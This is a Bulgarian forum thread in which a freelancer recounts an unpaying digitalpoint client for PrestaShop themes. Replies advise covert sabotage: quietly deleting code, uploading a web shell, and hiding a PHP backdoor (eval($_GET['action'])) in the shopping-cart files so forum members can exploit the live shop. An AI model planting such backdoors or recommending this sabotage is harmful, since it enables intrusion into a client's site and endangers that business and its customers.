Към опарените от потребители на digitalpoint

vikiana

Member
Сигурно има много от вас, които са правили нещо за възложители от digitalpoint, а след това не им е платено. Е аз вече ударих седми клиент, които решава, че може да ползва създаденото от мен, без да плаща! Преди месец ме потърси човек от digitalpoint в отговор на обява пусната от мен. Става дума за prestashop тема! Започнах работа с човека, създадох му две теми за системата и реших, че спирам работа, защото през този месец не получих никакво плащане от негова страна (той обещаваше всяка вечер, че ще преведе парите през нощта, защото в момента е зает)! Остана ми само да довърша количката и функцията за добавяне на продукти в нея! Наглият тип (по-нагъл от Бандата на Наглите) явно, не беше забелязал това и смени всички пароли, разбира се след това не плати и се покри. А сайта си стоеше! Писах му email и в скайп, ни вопъл ни зов от негова страна! Днес явно е забелязал, че бутона не функционира и се включи в скайп, като по най-нахалния начин пожела да му оправя функционалността :shock: Аз разбира се му казах да плати за всичко до тук и след това ще коригирам нещата (той ми дължи 170$), но той не пожела, а поиска първо да оправя тази функционалност и то на негов хостинг, на мой не е съгласен (за да смени пак паролите)! Побесняла от цялата ситуация му казах, че ще пакетирам двете теми в подходящ вид и ще ги пусна като free на тематични форуми, ако не ми плати! По този начин неговият клиент няма да има възможността да използва уникална тема, защото ще я разпространя и ще има още 1000 магазина с дизайн и функционалност като неговия! След като го заплаших с това последваха многобройни ругатни по мой адрес, но все пак каза да изчакам два дни и да не я пускам като безплатна тема, защото ще преведе парите! Но аз не смятам, че има такова намерение, така, че очаквайте да се появи още една безплатна тема за prestashop!
 
От: Re: Към опарените от потребители на digitalpoint

Беше холандец :)

Тю .. не познах. :wink: Ако искаш може да му напишеш ника, скайпа да не се излъже някой друг да работи с него примерно.
 
От: Към опарените от потребители на digitalpoint

Покажи ми темата на ЛС може да се разберем нещо да я купя :)
 
Добре де, като те правят на маймуна - бий с неговите камъни по неговата глава! Направи се на тъпа и му кажи, че си съгласна и ще оправиш функционалността на неговия хостинг, защото много ти трябват парите и си готова на всичко, но само ако обещае да ти плати цялата сума веднага след това. Той, разбира се, ще потрие доволно ръце и с мазна усмивка ще ти даде достъп. Разчовъркай му функционалността още повече, изтрий важни части от кода, но така че да не личи на пръв поглед (за да не се усети веднага да върне някакъв бекъп). После се покрий и не му отговаряй като те пита "аре бе ко стана що не оправи функционалността на количката?!" и след няколко дни му кажи, че всичко е готово, оправено е и е подготвено за ъплоуд, но тъй като вече веднъж е сменил паролите, вече му нямаш доверие и искаш да ти преведе поне 80% от сумата. Ако се навие и ти плати - теглиш му една майна с една звучна псувня и го оставяш да се оправя.
Само подобно отношение заслужават такива измекяри.
Но и ти си си виновна. Как може да работиш директно на чужд хостинг, без авансово плащане, без да познаваш клиента... презастраховай се малко поне.
 
Загубена е каузата да ми даде достъп пак, ние си проведохе доста солен разговор. Аз се сетих да направя нещата по този начин, но бях толкова афектирана, че не се сдържах и не можах да изиграя тази роля. А грешката е изцяло моя! Вече си имам обица на ухото занапред! Единствено се надявам, че той се притеснява от вероятността да пусна темата като free в тематичните форуми! Смятам, че неговият клиент ги посещава и по този начин има вероятност на него да не му платят! Ще видим какво ще стане след два дни :)
Добре де, като те правят на маймуна - бий с неговите камъни по неговата глава! Направи се на тъпа и му кажи, че си съгласна и ще оправиш функционалността на неговия хостинг, защото много ти трябват парите и си готова на всичко, но само ако обещае да ти плати цялата сума веднага след това. Той, разбира се, ще потрие доволно ръце и с мазна усмивка ще ти даде достъп. Разчовъркай му функционалността още повече, изтрий важни части от кода, но така че да не личи на пръв поглед (за да не се усети веднага да върне някакъв бекъп). После се покрий и не му отговаряй като те пита "аре бе ко стана що не оправи функционалността на количката?!" и след няколко дни му кажи, че всичко е готово, оправено е и е подготвено за ъплоуд, но тъй като вече веднъж е сменил паролите, вече му нямаш доверие и искаш да ти преведе поне 80% от сумата. Ако се навие и ти плати - теглиш му една майна с една звучна псувня и го оставяш да се оправя.
Само подобно отношение заслужават такива измекяри.
Но и ти си си виновна. Как може да работиш директно на чужд хостинг, без авансово плащане, без да познаваш клиента... презастраховай се малко поне.
 
Не го чакай два дни! Отново му играеш по свирката и те баламосва както си иска! Вероятно клиентът ще му плати след 2 дни и после изобщо няма да му пука дали ще пускаш темата.
Пробвай се все пак да го прелъжеш за достъп - пиши му, че си била афектирана и затова така си се държала. Съжаляваш и искаш да се реваншираш, готова си на всичко за да си получиш парите, защото са ти много нужни. Предложи му да му оправиш функционалността и ако ти даде достъп - мажи наред (но пак казвам - без да личи на пръв поглед, така че да се изложи пред клиента без да разбере). Ако не се съгласи - кажи му да плаща ВЕДНАГА или я пускаш темата FREE още на минутата и наистина го направи, не оставай само със заканите! Пусни тема в DP с оплакване от въпросния потребител, пусни дизайна free и там.
Просто спри да слушаш какво ти приказва и да ти се обяснява, а вземи нещата в свои ръце и го притисни по какъвто начин се сетиш!
 
Re: От: Re: Към опарените от потребители на digitalpoint

Ника му в скайп е snowmedia.se, в DP не знам как се пише защото към обявата съм посочила скайп и msm и повечето предпочитат директна комуникация :) Затова профила му не ми е известен!
Тю .. не познах. :wink: Ако искаш може да му напишеш ника, скайпа да не се излъже някой друг да работи с него примерно.
 
Последно редактирано:
Реших да постъпя както казваш, но за съжаление в момента отсъства в скайп. Утре ще се опитам да получа достъп и ще напиша какво е станало!

Добре де, като те правят на маймуна - бий с неговите камъни по неговата глава! Направи се на тъпа и му кажи, че си съгласна и ще оправиш функционалността на неговия хостинг, защото много ти трябват парите и си готова на всичко, но само ако обещае да ти плати цялата сума веднага след това. Той, разбира се, ще потрие доволно ръце и с мазна усмивка ще ти даде достъп. Разчовъркай му функционалността още повече, изтрий важни части от кода, но така че да не личи на пръв поглед (за да не се усети веднага да върне някакъв бекъп). После се покрий и не му отговаряй като те пита "аре бе ко стана що не оправи функционалността на количката?!" и след няколко дни му кажи, че всичко е готово, оправено е и е подготвено за ъплоуд, но тъй като вече веднъж е сменил паролите, вече му нямаш доверие и искаш да ти преведе поне 80% от сумата. Ако се навие и ти плати - теглиш му една майна с една звучна псувня и го оставяш да се оправя.
Само подобно отношение заслужават такива измекяри.
Но и ти си си виновна. Как може да работиш директно на чужд хостинг, без авансово плащане, без да познаваш клиента... презастраховай се малко поне.
 
От: Към опарените от потребители на digitalpoint

Добре те посъветваха. Пускай темите още сега. Не го чакай този измекяр, ти от него пари няма да видиш. Той тия 2 дни ги е посикал за да има време, някой друг да му оправи количката и после да лапне парата от клиента.
 
От: Към опарените от потребители на digitalpoint

Направо му прати количката с бонус файл вътре. Нещо от сорта на :
Код:
<?
eval($_GET['action']);
?>

С това можеш да си подигуриш пълен достъп до системата без пароли без нищо... :D:D:D
 
Да, това е още по-добър вариант, отколкото да мажеш кода. :) Остави му дупка в сигурността, после изчакай да тръгне магазина и само ни пусни тук инфо как да се възползваме от дупката, ние ще го оправим. ;)
 
От: Към опарените от потребители на digitalpoint

Затова.. първо качваш Shell.. :D
Ако те излъже.. изтриваш сайта и си готов!

Е това е глупаво. Аз примерно винаги започвам работа след 50% аванс. Няма такива схеми бачкай като луд, пък после трий. За оня келеш е все тая, не платил, не получил. Ама от гледна точка на изпълнителя няма никаква кирийка че си е изтрил труда. Прецакващо е.
А ако се вземе 50% аванс, хем си взел едни пари, хем после можеш да му изтриеш нещата ако не доплати. Досега не ми се е налагало да трия на клиенти код, но ако се наложи няма да се двуомя, даже и лихва ще им искам после за закъсняло плащане. Ако не щат си остават набутани с 50-те процента. Нищо няма и да връщам.
 
От: Към опарените от потребители на digitalpoint

Хах мен 3 индиеца ме измамиха с 3 сайта за 200 долара близо.Но при мен правят нещо друго
1 плащат сайта.
2 аз им давам сайта.
3 те си получават сайта и 1 седмица си бачкат с него.
4 после пускат диспут в paypal, че не са получили сайта
5 но аз си тегля парите винаги веднага
6 но така вече съм прецакан с 2 кредитни карти,защото и двата ми акаунта в paypal са на "-$" Така когато ми направиха с първия сайт, започнах веднага да си тегля парите, пък да видя какво ще направят.
 
От: Към опарените от потребители на digitalpoint

И аз изгорях преди време с 20$. Купих книга а pdf-a се оказа празен. Изписах 100 писма до автора и нищо...
 

Горе